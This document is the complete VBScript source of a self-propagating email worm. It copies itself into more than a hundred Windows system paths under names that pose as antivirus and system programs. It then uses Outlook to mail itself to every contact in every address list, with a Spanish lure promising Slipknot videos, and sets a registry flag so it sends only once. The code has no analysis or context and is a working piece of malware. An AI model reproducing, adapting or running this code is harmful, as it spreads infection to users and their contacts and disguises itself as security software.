Sub Copiarasimismo()
dim fso, eq, ctr, file, vbscopy
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy("C:\windows\spit_it_out.vbs")
c.Copy("C:\windows\surfacing.vbs")
c.Copy("C:\windows\system\Left_Behind.exe")
c.Copy("C:\windows\system\my_plague.exe")
c.Copy("C:\windows\System32\españa.exe")
c.Copy("C:\windows\System32\chile.exe")
c.Copy("C:\windows\Cursors\mexico.exe")
c.Copy("C:\windows\system\iowa.exe")
c.Copy("C:\windows\Command\iowa.mp3")
c.Copy("C:\windows\system\avp.exe")
c.Copy("C:\windows\system\norton.exe")
c.Copy("C:\windows\system\mcafee.exe")
c.Copy("C:\windows\system\regedit.exe")
c.Copy("C:\windows\system\wininfo.chm")
c.Copy("C:\windows\System32\mIRC.exe")
c.Copy("C:\windows\System32\IP.exe")
c.Copy("C:\winini.exe")
c.Copy("C:\windows\System32\saliva.exe")
c.Copy("C:\windows\Sistem\batusai.exe")
c.Copy("C:\windows\Sistem\macarena.exe")
c.Copy("C:\windows\Sistem\XP.exe")
c.Copy("C:\windows\Sistem\saliva.exe")
c.Copy("C:\windows\Sistem\msn.exe")
c.Copy("C:\windows\Sistem\server.exe")
c.Copy("C:\windows\Sistem\latinmail.exe")
c.Copy("C:\windows\Sistem\PC.exe")
c.Copy("C:\windows\Sistem\jefe.exe")
c.Copy("C:\windows\Sistem\sos.exe")
c.Copy("C:\windows\Sistem\labs.exe")
c.Copy("C:\windows\Sistem\PANDA.exe")
c.Copy("C:\windows\Sistem\XXX.exe")
c.Copy("C:\windows\Sistem\nr.exe")
c.Copy("C:\windows\system\panda_antivirus.exe")
c.Copy("C:\windows\system\w32.exe")
c.Copy("C:\windows\system\fama.exe")
c.Copy("C:\windows\system\cd.exe")
c.Copy("C:\windows\system\popup.exe")
c.Copy("C:\windows\system\age.exe")
c.Copy("C:\windows\system\superstar.exe")
c.Copy("C:\windows\system\mov.exe")
c.Copy("C:\windows\system\muxo.exe")
c.Copy("C:\windows\system\mandarina.exe")
c.Copy("C:\windows\system\red.exe")
c.Copy("C:\windows\system\online.exe")
c.Copy("C:\windows\system\Jdbgmgr.exe")
c.Copy("C:\windows\system\power.exe")
c.Copy("C:\windows\system\error.exe")
c.Copy("C:\windows\system\621.exe")
c.Copy("C:\windows\system\611.exe")
c.Copy("C:\windows\system\opensystem.exe")
c.Copy("C:\windows\system\delete_system.exe")
c.Copy("C:\windows\system\cold.exe")
c.Copy("C:\windows\system\sound.exe")
c.Copy("C:\windows\system\software.exe")
c.Copy("C:\windows\system\shareware.exe")
c.Copy("C:\windows\system\hadware.exe")
c.Copy("C:\windows\system\hadcore.exe")
c.Copy("C:\windows\system\p.exe")
c.Copy("C:\windows\system\tcp_ip.exe")
c.Copy("C:\windows\system\netstat.vbs")
c.Copy("C:\windows\system\hi_fi.exe")
c.Copy("C:\windows\system\intel.exe")
c.Copy("C:\windows\system\procesador.exe")
c.Copy("C:\windows\system\chm.chm")
c.Copy("C:\windows\system\helps.chm")
c.Copy("C:\windows\system\mp3.exe")
c.Copy("C:\windows\system\winamp.exe")
c.Copy("C:\windows\system\real_player.exe")
c.Copy("C:\windows\system\real_world.exe")
c.Copy("C:\windows\system\copy.exe")
c.Copy("C:\windows\system\exe.exe")
c.Copy("C:\windows\system\hkcu.exe")
c.Copy("C:\windows\system\genius.exe")
c.Copy("C:\windows\system\surf.exe")
c.Copy("C:\windows\system\hoax.exe")
c.Copy("C:\windows\system\mula.exe")
c.Copy("C:\windows\system\wscript.exe")
c.Copy("C:\windows\system\poderoso.exe")
c.Copy("C:\windows\system\clima.exe")
c.Copy("C:\windows\system\wordl.exe")
c.Copy("C:\windows\system\latin_america.exe")
c.Copy("C:\windows\system\latin.exe")
c.Copy("C:\windows\system\vbs.exe")
c.Copy("C:\windows\system\clock.exe")
c.Copy("C:\windows\system\trv.exe")
c.Copy("C:\windows\system\php.exe")
c.Copy("C:\windows\system\copa.exe")
c.Copy("C:\windows\system\ping_pong.exe")
c.Copy("C:\windows\system\animal.exe")
c.Copy("C:\windows\system\golpear.exe")
c.Copy("C:\windows\system\garantizar.exe")
c.Copy("C:\windows\system\party_hard.exe")
c.Copy("C:\windows\system\plague.exe")
c.Copy("C:\windows\system\space.exe")
c.Copy("C:\windows\system\pregunta.exe")
c.Copy("C:\windows\system\sucio.exe")
c.Copy("C:\windows\system\publicitario.exe")
c.Copy("C:\windows\system\sounds_porns.exe")
c.Copy("C:\windows\system\audio.exe")
c.Copy("C:\windows\system\seguro.exe")
c.Copy("C:\windows\system\firewall.exe")
c.Copy("C:\windows\system\xlms.exe")
c.Copy("C:\windows\system\atuendos.exe")
c.Copy("C:\windows\system\c.exe")
c.Copy("C:\windows\system\jaja.exe")
c.Copy("C:\windows\system\marea.exe")
c.Copy("C:\windows\system\roja.exe")
c.Copy("C:\windows\system\supr.exe")
c.Copy("C:\windows\system\autowin.exe")
c.Copy("C:\windows\system\maligno.exe")
c.Copy("C:\windows\system\quake.exe")
c.Copy("C:\windows\system\quake2.exe")
c.Copy("C:\windows\system\quake3.exe")
c.Copy("C:\windows\system\hexen.exe")
c.Copy("C:\windows\system\starcraft.exe")
c.Copy("C:\windows\system\expansion.exe")
c.Copy("C:\windows\system\universo.exe")
c.Copy("C:\windows\system\swa.exe")
c.Copy("C:\windows\system\objeto.exe")
c.Copy("C:\windows\system\nerfix.exe")
c.Copy("C:\windows\system\xpload.exe")
c.Copy("C:\windows\system\kuasanagui.exe")
c.Copy("C:\windows\system\hoko.exe")
c.Copy("C:\windows\system\neodrako.exe")
c.Copy("C:\windows\system\hhh.exe")
c.Copy("C:\windows\system\nemesixx.exe")
c.Copy("C:\windows\system\venezuela_demon.exe")
c.Copy("C:\windows\system\k.exe")
c.Copy("C:\windows\system\bien.exe")
c.Copy("C:\windows\system\agregar_un_contacto.exe")
c.Copy("C:\windows\system\static_x.exe")
c.Copy("C:\windows\system\666.exe")
c.Copy("C:\windows\system\slipknot.exe")
c.Copy("C:\windows\system\desire.exe")
c.Copy("C:\windows\system\words.exe")
c.Copy("C:\windows\system\silence.exe")
c.Copy("C:\windows\system\7.exe")
c.Copy("C:\windows\system\channel.exe")
c.Copy("C:\windows\system\i_stand_alone.exe")
c.Copy("C:\windows\system\power_point.exe")
c.Copy("C:\windows\system\rock.exe")
c.Copy("C:\windows\system\52x.exe")
c.Copy("C:\windows\system\2x.exe")
c.Copy("C:\windows\system\golpe_a_golpe.exe")
c.Copy("C:\windows\system\ley.exe")
c.Copy("C:\windows\system\molotov.exe")
c.Copy("C:\windows\system\golpe_a_golpe.exe")
c.Copy("C:\windows\system\golpe_a_golpe.exe")
c.Copy("C:\windows\system\golpe_a_golpe.exe")
c.Copy("C:\windows\system\golpe_a_golpe.exe")
c.Copy("C:\windows\system\golpe_a_golpe.exe")
c.Copy("C:\windows\system\golpe_a_golpe.exe")
c.Copy("C:\windows\system\golpe_a_golpe.exe")
end sub
On Error Resume Next
jcgnrpsxeoeanxg = WScript.ScriptFullName
Set xogcdjxjuoasecu = CreateObject("WScript.Shell") 
If xogcdjxjuoasecu.RegRead("HKCU\Software\slip_sent") <> "yea" Then
Set fovjtvilposaimu = CreateObject("Outlook.Application")
If fovjtvilposaimu <> "" Then
Set foywawyvmqnrfap = fovjtvilposaimu.GetNameSpace("MAPI")
For twwfwbdsqnbwyjr = 1 to foywawyvmqnrfap.AddressLists.Count
Set eruqofayhhhpmyh = fovjtvilposaimu.CreateItem(0)
Set hjjgcgvexepxlig = foywawyvmqnrfap.AddressLists.Item(twwfwbdsqnbwyjr)
eruqofayhhhpmyh.Attachments.Add jcgnrpsxeoeanxg
eruqofayhhhpmyh.Subject = "hola quieres ver todos los videos de slipknot"
eruqofayhhhpmyh.Body = "con este programa vas a poder ver todo el video"
eruqofayhhhpmyh.Body = eruqofayhhhpmyh.Body + vbCrLf + "slipknot y sus mejores videos"
Set gntcaebrthyhhxl = hjjgcgvexepxlig.AddressEntries
Set fbbucrnacfbiywk = eruqofayhhhpmyh.Recipients
For jigctytkhhgbecm = 1 to gntcaebrthyhhxl.Count
eruqofayhhhpmyh.Recipients.Add gntcaebrthyhhxl.Item(jigctytkhhgbecm)
Next
eruqofayhhhpmyh.Send
Next
xogcdjxjuoasecu.RegWrite "HKCU\Software\slip_sent", "yea" 
End If
End If